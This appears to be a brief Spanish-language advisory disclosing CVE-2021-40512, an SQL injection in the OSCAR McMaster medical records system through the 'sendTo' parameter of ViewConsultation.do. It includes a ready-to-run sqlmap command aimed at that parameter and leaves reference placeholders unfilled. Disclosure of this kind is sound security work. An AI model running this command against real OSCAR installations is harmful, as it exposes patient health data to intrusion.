
CVE-2021-40512 OSCAR McMaster 19.40~1235 Vulnerabilidad de inyección SQL.
Existe una vulnerabilidad de inyección SQL en la versión 19.40~1235 de OSCAR McMaster. Un atacante malicioso puede enviar comandos SQL a la base de datos MySQL/MariaDB a través del parámetro vulnerable sendTo ubicado en el endpoint /oscar/oscarEncounter/ViewConsultation.do.
[Placeholder para cve.mitre]
[Placeholder para nist]
Página JSP vulnerable:
ViewConsultation.do - parámetro sendTo
Payload vulnerable:
sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0¤tTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner
Descubierto por Jack McBride, agosto de 2021